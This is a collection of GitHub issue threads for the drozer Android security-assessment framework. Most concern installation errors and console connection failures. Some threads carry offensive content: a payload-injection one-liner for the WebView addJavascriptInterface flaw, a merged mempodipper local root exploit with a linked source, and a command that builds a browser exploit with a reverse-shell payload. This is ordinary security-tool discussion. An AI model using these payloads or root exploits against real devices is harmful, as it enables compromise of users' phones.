In the "WebView addJavascriptInterface Remote Code Execution" article, there is a great introduction to drozer payload injecting using the addJavaScriptInterface flaw. However, I think the payload delivery method is broken on Android devices running /system/bin/ash.

The article recommends this line for creating a payload to inject through malicious JavaScript:

$ drozer payload build weasel.shell.armeabi | grep echo | awk -F \" {'gsub("\\\\","\\\\");
print "execute([\x27/system/bin/sh\x27,\x27-c\x27,\x27 echo -e \\\""$2"\\\" > \x27+path]);"'}

Which will give you a one liner:

execute(['/system/bin/sh','-c','echo -e "…………………" > '+path]);

However, it does not appear that the /system/bin/sh (which is ash) appropriately accommodates octal escaping in this manner:

# /system/bin/sh -c echo -e "\0177\0105\0114\0106\0001\0001" >f
# ls -l f
-rw-rw-rw- root     root            1 2013-10-12 23:06 f

It looks like ash does not preserve the input data, leaving us with a 1 byte file (expected 6 bytes). Not to be discriminatory, ash doesn't preserve the input data for hex escaping either:

# /system/bin/sh -c echo -e "\x41\x41\x41\x41" >f
# ls -l f
-rw-rw-rw- root     root            1 2013-10-12 23:12 f

I'm testing this on an Android API15 emulator. Any thoughts on getting escaped binary content delivered to Android devices for Weasel deployment reliably?

Thanks,

-Josh

Hi

As soon as i try to connect to the virtual device (drozer console connect), i have this error

drozer Console (v2.3.4) [Errno 22] Invalid argument

On the virtual device, i see in the app log:

Accepted connection Starting drozer thread W Connection was reset

Any idea about what could be the issue?

Thanks

We are looking at redesigning the communications protocol to take this project to the next level.

The communication protocol is rather simple at the moment and is using a defined XML communication in 1 direction only, from client to server. In order to reach a point where Mercury can be used for many purposes, the following would need to be supported by the communications protocol:

• Encryption - I suspect something like SSL would be best
• Bi-directional communications. The ability to have the server connect back to the client OR the client connect to the server would (i.e. Reverse and bind connections) be needed in many applications of Mercury.

By implementing these, it would be the most flexible. Examples of when a bind connection is needed: current "assessment suite". Examples of when a reverse connection is needed: full exploitation suite

Any ideas are welcome Tyrone

When typing connect the console hangs on some devices. It has been noted to do this on the Galaxy Nexus. It could be all Ice Cream Sandwich devices as well.

It is believed that this happens when loading libjackpal-androidterm3.so

i was using drozer successfully , but suddenly this error is showing while connecting to "[Errno 22] Invalid argument" Could you help me to figure out what wrong i am doing?

Same happened on other device too.

Thanks for making wonderful product.

Current public releases of mempodipper most recent local root for android devices based on /proc/pid/mem arbitrary write only supports a few handsets, as the exploit requires you pass it offsets for setuid() and for exit(), and these have only been determined for a number of devices. nesquick95 @ xda developers devised a method for obtaining these offsets, and I have merged his code into the mempodipper exploit. Cross compile for arm, and then run on a vulnerable device:

./mempodipper < address to exit> < address to setuid> <-command>

or now alternatively:

./mempodipper - - <-command>

The dynamic version of mempodipper is relatively untested, and likely needs some work before it is ready to be incorporated into mercury, however most of the work is already done.

source here: http://pastebin.com/RM4zyy9a

i have tried to install drozer with Building for Debian/Ubuntu/Mint and Installing .deb (Debian/Ubuntu/Mint) but both ways didn't worked for me. I am facing this issue while installing the drozer as below : Error 1: cd common; protoc --python_out=../src/pydiesel/api/ protobuf.proto /bin/sh: 1: protoc: not found make: *** [Makefile:55: src/pydiesel/api/protobuf_pb2.py] Error 127

Error 2: dpkg: dependency problems prevent configuration of drozer: drozer depends on python-protobuf (>= 2.4.1); however: Package python-protobuf is not installed.

dpkg: error processing package drozer (--install): dependency problems - leaving unconfigured Errors were encountered while processing: drozer

i have installed protobuf also using pip command, but still getting this same issue.

Hi,

I was following the user guide and trying to get the exploit shown in the guide working, but it throws an error "could not repack the agent sources". See below

$ drozer exploit build exploit.remote.browser.nanparse --payload weasel.reverse_tcp.armeabi --credentials weasel pass1234 --server 0.0.0.0:31415 --resource /home.html
Uploading weasel to /weasel and W...  [  OK  ]
Packaging an Agent... (this may take some time)
could not repack the agent sources

Uploading the Agent to /agent.apk and A...
$

Also the user guide is kinda outdated, it has incorrect syntax and exploit name, in addition to typo.

However, all these don't mask the fact that drozer is a very promising tool, if the exploit list is actively maintained.

Thanks!

Hi, We are a little bit worried about the license of Mercury. Since it is not a well known license we are not sure if we will be allowed to keep working on it in the future. I'm sure the people that work on Mercury would be more confortable if it is licensed under a well known license such as Apache or GPL. And maybe more people would be interested to contribute to the project.

Steps to reproduce

1.I am trying to install Drozer 2.4.4 when I try to run the command "python setup.py bdist_wheel" 2.I have installed and verified the prereqs. I have cloned the repository

I receive the following error Traceback (most recent call last): File "setup.py", line 4, in import setuptools ImportError: No module named setuptools cparker@cparker-Latitude-E7470:~/drozer$

Environment

Ubuntu 20.10 cparker@cparker-Latitude-E7470:~$ java --version openjdk 11.0.9.1 2020-11-04 OpenJDK Runtime Environment (build 11.0.9.1+1-Ubuntu-0ubuntu1.20.10) OpenJDK 64-Bit Server VM (build 11.0.9.1+1-Ubuntu-0ubuntu1.20.10, mixed mode, sharing)

I have Googled the error and tried to correct it.

cparker@cparker-Latitude-E7470:~$ sudo apt-get install python-setuptools Reading package lists... Done Building dependency tree
Reading state information... Done python-setuptools is already the newest version (44.1.1-1). 0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

Steps to reproduce

git clone https://github.com/mwrlabs/drozer/
cd drozer
python setup.py bdist_wheel

Expected behaviour

should Building Python wheel

Actual behaviour: root@kali:~/drozer# python setup.py bdist_wheel Traceback (most recent call last): File "setup.py", line 132, in version = get_version(), File "setup.py", line 128, in get_version return subprocess.check_output(version_cmd).split('-', 1)[0] File "/usr/lib/python2.7/subprocess.py", line 216, in check_output process = Popen(stdout=PIPE, *popenargs, **kwargs) File "/usr/lib/python2.7/subprocess.py", line 394, in init errread, errwrite) File "/usr/lib/python2.7/subprocess.py", line 1047, in _execute_child raise child_exception OSError: [Errno 2] No such file or directory

Environment

Operating system:Linux Kali

**Java Version:**1.7

Drozer Version: latest clone

please help

Steps to reproduce

Hi, I have face some issue during the installation of drozer. when I try to setup the drozer using python.exe setup.py bdist_msi it shows me this kind error:

Traceback (most recent call last):
  File "C:\Users\User\Downloads\drozer-develop\setup.py", line 8, in <module>
    from src.drozer import meta
  File "C:\Users\User\Downloads\drozer-develop\src\drozer\meta.py", line 63
    print "%s %s\n" % (name, version)
          ^
SyntaxError: invalid syntax

And That's why I cannot install it. Please can anyone help me to how get rid out of it??

drozer console connect Traceback (most recent call last): File "C:\Python27\Scripts\drozer", line 30, in import("drozer.cli.%s" % (sys.argv[1])) File "C:\Python27\lib\site-packages\drozer\cli\console.py", line 8, in from drozer.console import Console File "C:\Python27\lib\site-packages\drozer\console_init_.py", line 4, in from drozer.console.console import Console File "C:\Python27\lib\site-packages\drozer\console\console.py", line 5, in from pydiesel.api.protobuf_pb2 import Message File "C:\Python27\lib\site-packages\pydiesel\api_init_.py", line 9, in from pydiesel.api.frame import Frame File "C:\Python27\lib\site-packages\pydiesel\api\frame.py", line 3, in from pydiesel.api.protobuf_pb2 import Message File "C:\Python27\lib\site-packages\pydiesel\api\protobuf_pb2.py", line 3, in from google.protobuf import descriptor ImportError: No module named google.protobuf

here is my module code: ################################################################################ from drozer.modules import Module

class GetInteger(Module) : name = "Get Device info" description = "A module that returns information about the device and hardware features" examples = "run ex.device.getinteger" date = "10-11-13" author = "Keith Makan" license = "BSD (3-clause)" path = ["ex","device"] def execute (self,arguments) : build = self.new ("android.os.Build") self.stdout.write ("Getting device info . . . \n") self.stdout.write ("[ * ] BOARD : %s\n" % (build.BOARD) ) self.stdout.write ("[ * ] BOOTLOADER : %s\n" % (build.BOOTLOADER) ) self.stdout.write ("[ * ] BRAND : %s\n" % (build.BRAND) ) self.stdout.write ("[ * ] CPU__ABI : %s\n" % (build.CPU__ABI) ) self.stdout.write ("[ * ] CPU__ABI2 : %s\n" % (build.CPU__ABI2) ) self.stdout.write ("[ * ] DEVICE : %s\n" % (build.DEVICE) ) self.stdout.write ("[ * ] DISPLAY : %s\n" % (build.DISPLAY) ) self.stdout.write ("[ * ] FINGERPRINT : %s\n" % (build.FINGERPRINT) ) self.stdout.write ("[ * ] HARDWARE : %s\n" % (build.HARDWARE) ) self.stdout.write ("[ * ] MANUFACTURER : %s\n" % (build.MANUFACTURER) ) self.stdout.write ("[ * ] MODEL : %s\n "% (build.MODEL) ) self.stdout.write ("[ * ] TAGS : %s\n" % (build.TAGS) )

########################################################################### but when i run it , "does not define an execute() method" is showed but i really define the execute. so where is wrong??

I tried reinstalling python2.7, reinstalling drozer, setting environment variables, updating modules, installing from another pc. But I get the same message as below. please Help.

Steps to reproduce

1. git clone https://github.com/FSecureLABS/drozer.git
2. cd drozer
3. python.exe setup.py bdist_msi
4. install drozer pip2 install pyyaml pip2 install protobuf pip2 install pyopenssl pip2 install twisted pip2 install service_identity
5. install agent.apk in Nox player
6. adb forward tcp:31415 tcp:31415
7. drozer console connect success

Expected behaviour

drozer console connect success

Actual behaviour

C:\Users\user>drozer.bat console connect

Traceback (most recent call last):
  File "C:\Python27\Scripts\drozer", line 30, in <module>
    __import__("drozer.cli.%s" % (sys.argv[1]))
  File "C:\Python27\Lib\site-packages\drozer\cli\console.py", line 8, in <module>
    from drozer.console import Console
  File "C:\Python27\Lib\site-packages\drozer\console\__init__.py", line 4, in <module>
    from drozer.console.console import Console
  File "C:\Python27\Lib\site-packages\drozer\console\console.py", line 5, in <module>
    from pydiesel.api.protobuf_pb2 import Message
  File "C:\Python27\Lib\site-packages\pydiesel\api\__init__.py", line 9, in <module>
    from pydiesel.api.frame import Frame
  File "C:\Python27\Lib\site-packages\pydiesel\api\frame.py", line 3, in <module>
    from pydiesel.api.protobuf_pb2 import Message
  File "C:\Python27\Lib\site-packages\pydiesel\api\protobuf_pb2.py", line 3, in <module>
    from google.protobuf import descriptor
  File "C:\Python27\lib\site-packages\google\protobuf\descriptor.py", line 113
    class DescriptorBase(metaclass=DescriptorMetaclass):
                                  ^
SyntaxError: invalid syntax`

Environment

Operating system: Windows 10

USER Renvironment variables PATH =

C:\Python27`
C:\Python27\Scripts

PYTHONPATH =

C:\Python27\Lib\site-packages
C:\Users\user\drozer\src
C:\Users\user\drozer\test

SYSTEM environment variables

PATH =

%JAVA_HOME%\bin
C:\Program Files\Common Files\Oracle\Java\javapath

JAVA_HOME= C:\Program Files\JAVA\jdk-17

Java Version: Openjdk 17 Python 2.7

It's been a while since I've used Drozer via Windows 10.

I updated to the 2.4.4 version, started the app, forwarded the correct port, but continue to get this error message

I tried uninstalling dependencies and re-installing them, but with the EOL of Python2.7, it's been growing more and more frustrating. Any help on this would be very appreciated.

Hi, I'm new here and I'm trying to connect my Samsung Galaxy A51 to my Windows 7 x64 in order to run some script that relies on Drozer.

Steps to reproduce

1. I've successfully installed Python 2.7.18, Java SE Developer Kit 1.7.0_80, Android Debug Bridge 1.0.41 (31.0.2-7242960) and Drozer 2.4.4 on my Windows 7 x64 computer.
2. I've successfully added Python 2.7.18, Java SE Developer Kit 1.7.0_80, Android Debug Bridge 1.0.41 (31.0.2-7242960) and Drozer 2.4.4 to System > Advanced Proprieties > Environment Variables > System Variables > Path.
3. I've successfully installed packages attrs 21.2.0, Automat 20.2.0, cffi 1.14.5, constantly 15.1.0, cryptography 3.3.2, drozer 2.4.3, enum34 1.1.10, hyperlink 21.0.0, idna 2.10, incremental 21.3.0, ipaddress 1.0.23, pip 20.3.4, protobuf 3.17.2, pyasn1 0.4.8, pyasn1-modules 0.2.8, pycparser 2.20, PyHamcrest 1.10.1, pyOpenSSL 20.0.1, PyYAML 5.4.1, service-identity 21.1.0, setuptools 44.1.1, six 1.16.0, Twisted 20.3.0, typing 3.10.0.0, wheel 0.36.2 and zope.interface 5.4.0 to Python 2.7.18.
4. I've successfully connected my mobile to my PC via factory-provided USB cable and programmed it so that "USB controlled by" is set to "This phone" (I actually tried setting it to "Connected device" first, but it failed and I was forced to settle for "This phone"), "Use USB for" is set to "Transferring files" and "USB debugging" is toggled on (permission for my PC to debug my phone granted, as confirmed by command adb devices returning List of devices attached > RQ8N300XYDH device).
5. I've successfully installed Drozer Agent 2.3.4 to my Samsung Galaxy A51 mobile phone (OS Android 10).
6. I've successfully run command adb forward tcp:31415 tcp:31415 as instructed, returning 31415.
7. I've attempted to run drozer console connect --server 192.168.0.17 (where 192.168.0.17 is my phone's IP address according to Settings > About Phone > Status > IP address), but after roughly 30s, I get a return message

C:\Program Files\Python27\lib\site-packages\OpenSSL\crypto.py:14: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography import utils, x509
There was a problem connecting to the drozer Server.

Things to check:

 - is the drozer Server running?
 - have you set up appropriate adb port forwards?
 - have you specified the correct hostname and port with --server?
 - is the server protected with SSL (add an --ssl switch)?
 - is the agent protected with a password (add a --password switch)?

Debug Information:
[Errno 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond

observations:

1. The Python error message appears immediately, but variations thereof occur every time I run anything on Python 2.7.18; as long as it says support […] will be removed in the next release rather than this version of Python is not supported, I don't believe that's the root of my problem. In any case, that's it for about 30s, then the rest of the error message (starting with "There was a problem connecting to the drozer Server.") appears. I believe it's trying to connect and failing; I have no idea why.
2. If by "drozer Server" you mean the computer programme, "Python drozer-2.4.4" (installed via a file drozer-2.4.4.win32.msi I downloaded from https://labs.f-secure.com/tools/drozer/), then yes, it is running. If by "drozer Server" you mean the drozer 2.4.3 package in Python (installed by running python -m pip install drozer on an elevated Command Prompt), then yes, it's running, though it is not the same version number as the Drozer computer programme aforementioned. If by "drozer Server" you mean the "drozer Agent 2.3.4" app on my mobile (installed by downloading a package drozer-agent-2.3.4.apk from https://github.com/FSecureLABS/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk into the platform-tools folder and executing adb install drozer-agent-2.3.4.apk on an elevated Command Prompt), then yes, it's running, though the version number is not the same as either of the above. I've attempted "closing" the app and clearing my RAM memory, then launching it again, turning the "Embedded Server" option off and on again, and running drozer console connect --server 192.168.0.17 anew, but the only change is it only took 25s to return the error message this time (also, the app now records an error message of its own, "IO Error. Resetting connection." > "Stopped." > "Starting Server…" > "Attempting to bind to port 31415…" > "Waiting for connections…"; the latter three messages are the same ones it had been showing before, though, which are still recorded above the error message).
3. I believe "set[ting] up appropriate adb port forwards" would be that adb forward tcp:31415 tcp:31415 command, right? Did I not execute it correctly?
4. The "correct hostname and port" would be my mobile's IP address, right? Which is a function of the network, BTW. I've attempted switching networks, which changed the phone's IP address, but the result (replacing the old IP in the command line with the new one) is still the same.
5. According to the app, SSL is disabled.
6. In the app settings, there's an option "Password", but the field is empty, and the instructions and tutorials didn't say anything about it being mandatory, so I left it blank (as it was when the app was first installed).
7. Google has nothing on Errno 10060 regarding Drozer.

Expected behaviour

According to the instructions and tutorials, I should be presented with a Drozer command prompt that looks like selecting f75640f67144d9a3 (unknown sdk 4.1.1). I would then be able to run commands on the Drozer console, and the programme would be able to perform DAST (or SAST) on my mobile.

Actual behaviour

I get an error message [Errno 10060] because the Drozer on my PC failed to connect to the Drozer Agent on my phone, and therefore cannot start up the Drozer console.

Environment

Operating system: Windows 7 x64

Java Version: Java SE Developer Kit 1.7.0_80

Android Version: 10

Drozer Version: 2.4.4 (Windows); 2.4.3 (Python); 2.3.4 (Android)

Install Method: Installed from .msi package (Windows); python -m pip install drozer (Python); adb install drozer-agent-2.3.4.apk (Android)

Drozer Config

No idea. How do I access this file?

Drozer Error Logs

C:\Program Files\Python27\lib\site-packages\OpenSSL\crypto.py:14: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography import utils, x509
There was a problem connecting to the drozer Server.

Things to check:

 - is the drozer Server running?
 - have you set up appropriate adb port forwards?
 - have you specified the correct hostname and port with --server?
 - is the server protected with SSL (add an --ssl switch)?
 - is the agent protected with a password (add a --password switch)?

Debug Information:
timed out

ADB Logs

Running

adb logcat -c
adb logcat > drozer_error.log

causes the Command Prompt to stop responding.